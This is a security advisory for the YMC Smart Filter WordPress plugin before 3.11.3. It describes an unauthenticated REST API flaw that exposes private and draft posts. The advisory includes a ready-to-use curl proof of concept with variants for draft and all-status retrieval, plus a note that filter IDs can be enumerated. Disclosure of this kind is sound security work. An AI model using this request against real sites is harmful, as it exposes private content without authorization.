YMC Smart Filter < 3.11.3 – Unauthenticated Private/Draft Post Disclosure | CVE 2026-10823

Description

The plugin does not properly authorize access to one of its REST API endpoints and does not validate a user-supplied query parameter, allowing unauthenticated attackers to retrieve the titles and content of private, draft, and other non-public posts.

Proof of Concept

Prerequisites: the plugin is active and at least one filter has been created and published by an administrator (the plugin's normal usage). Filter IDs are sequential post IDs and can be enumerated. No authentication is required.

As an unauthenticated user, send the desired post status to the public filter REST endpoint:

curl -s -X POST "https://TARGET/wp-json/ymc/v1/posts/filter" \
  -H "Content-Type: application/json" \
  -d '{"params":{"filter_id":1,"post_types":["post"],"post_status":"private","paged":1}}'

Expected result: the JSON response (data.rendered_posts / data.found_posts) returns the titles and content of private posts. Use "post_status":"draft" for drafts, or "post_status":["private","draft","publish"] to retrieve posts of all statuses at once.